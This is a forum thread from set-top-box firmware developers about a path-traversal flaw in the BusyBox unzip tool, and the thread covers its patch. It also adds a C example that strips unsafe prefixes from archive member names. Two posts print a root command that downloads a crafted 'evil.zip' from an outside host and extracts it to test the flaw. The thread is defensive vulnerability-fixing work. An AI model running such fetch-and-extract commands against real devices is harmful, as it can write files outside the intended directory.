Very important - security issue


27 replies to this topic

Re: Very important - security issue #21 athoik

  • PLi® Core member
  • 8,458 posts

+327
Excellent

Posted 28 May 2017 - 19:32

Develop version, no problem.

satdreamgr-openpli 5 osmega

osmega login: root
Password:
root@osmega:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tmp/tmp1;
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |***********|   150   0:00:00 ETA
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory
root@osmega:/var/volatile/tmp#
 

Wavefield T90: 0.8W - 1.9E - 4.8E - 13E - 16E - 19.2E - 23.5E - 26E - 33E - 39E - 42E - 45E on EMP Centauri DiseqC 16/1
Unamed: 13E Quattro - 9E Quattro on IKUSI MS-0916

Re: Very important - security issue #22 WanWizard

  • PLi® Core member
  • 68,303 posts

+1,718
Excellent

Posted 28 May 2017 - 19:46

I can confirm that.

 

Question is if it's worthwhile spending time on an image to be retired soon, and if so, who's going to do it?


Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Pro (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)

Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.

Many answers to your question can be found in our new and improved wiki.


Re: Very important - security issue #23 athoik

  • PLi® Core member
  • 8,458 posts

+327
Excellent

Posted 28 May 2017 - 20:53

I guess that commit fixes the unzip problem: https://github.com/m...abab885f1ef7680

Adding function strip_unsafe_prefix(_unzip) in unzip.c should be enough.

Will check it, if nobody else comes up with a fix in the next few days.

Re: Very important - security issue #24 WanWizard

  • PLi® Core member
  • 68,303 posts

+1,718
Excellent

Posted 28 May 2017 - 22:00

Looks logical. Evaluating it is above my paygrade, so if someone can test it before we commit it?




Re: Very important - security issue #25 janejak

  • Senior Member
  • 284 posts

+11
Neutral

Posted 29 May 2017 - 05:12

I forgot to mention that my box, a DM900, runs Newnigma2.



Re: Very important - security issue #26 athoik

  • PLi® Core member
  • 8,458 posts

+327
Excellent

Posted 29 May 2017 - 15:44

"Looks logical. Evaluating it is above my paygrade, so if someone can test it before we commit it?"


Tested and works!
 
root@xpeedc:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tmp/tmp1;
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |***********************************************************************************************************************************************************|   150   0:00:00 ETA
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory
Here is the PR: https://github.com/O...e-core/pull/242

Thanks @samsamsam

Edited by athoik, 29 May 2017 - 15:44.


Re: Very important - security issue #27 MiLo

  • PLi® Core member
  • 14,042 posts

+298
Excellent

Posted 29 May 2017 - 18:24

Cheap fix, merged it.

Security implications should be next to nothing anyway, any sane plugin that processes compressed files should use Python's built-in modules. The scenario as described in the article would never apply to OpenPLi anyway.
Real musicians never die - they just decompose
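
The kind of member-name sanitising the merged fix relies on, as an added example that is not part of the original posts and is not BusyBox's code. `safe_member_name` is a hypothetical helper, and the sample names are constructed (the first mirrors the member in the test archive used above).

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper for this example (not BusyBox source): returns a
 * pointer into `name` past any prefix that could place the extracted
 * file outside the destination directory. */
static const char *safe_member_name(const char *name)
{
    const char *cp = name;

    for (;;) {
        const char *up;

        if (*cp == '/') {                  /* absolute path: drop the slash */
            cp++;
            continue;
        }
        if (strncmp(cp, "../", 3) == 0) {  /* leading parent reference */
            cp += 3;
            continue;
        }
        up = strstr(cp, "/../");           /* parent reference further in */
        if (!up)
            break;
        cp = up + 4;                       /* keep only what follows it */
    }
    if (strcmp(cp, "..") == 0)             /* bare ".." names no file */
        cp += 2;                           /* empty result: caller skips it */
    return cp;
}

int main(void)
{
    /* Constructed member names; the first matches the thread's test archive. */
    static const char *const names[] = {
        "../../make_some_bad.elf", "/etc/passwd", "a/b/../../../x",
        "docs/readme.txt", "..",
    };
    size_t i;

    for (i = 0; i < sizeof(names) / sizeof(names[0]); i++) {
        const char *safe = safe_member_name(names[i]);

        if (safe != names[i])
            printf("removing leading '%.*s' from '%s'\n",
                   (int)(safe - names[i]), names[i], names[i]);
        printf("  extract as: '%s'\n", safe);
    }
    return 0;
}
```

An extractor using such a helper should skip any member whose sanitised name comes back empty.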

Re: Very important - security issue #28 samsamsam

  • Senior Member
  • 2,024 posts

+146
Excellent

Posted 29 May 2017 - 18:45

@MiLo

"should use Python's built-in modules"

Really? You are sure that "Python's built-in modules" are not vulnerable to this?

Second thing: you suggest that it is better to block the main GUI thread when extracting an archive than to use the eConsole component?

 

I have no more questions...


Edited by samsamsam, 29 May 2017 - 18:45.


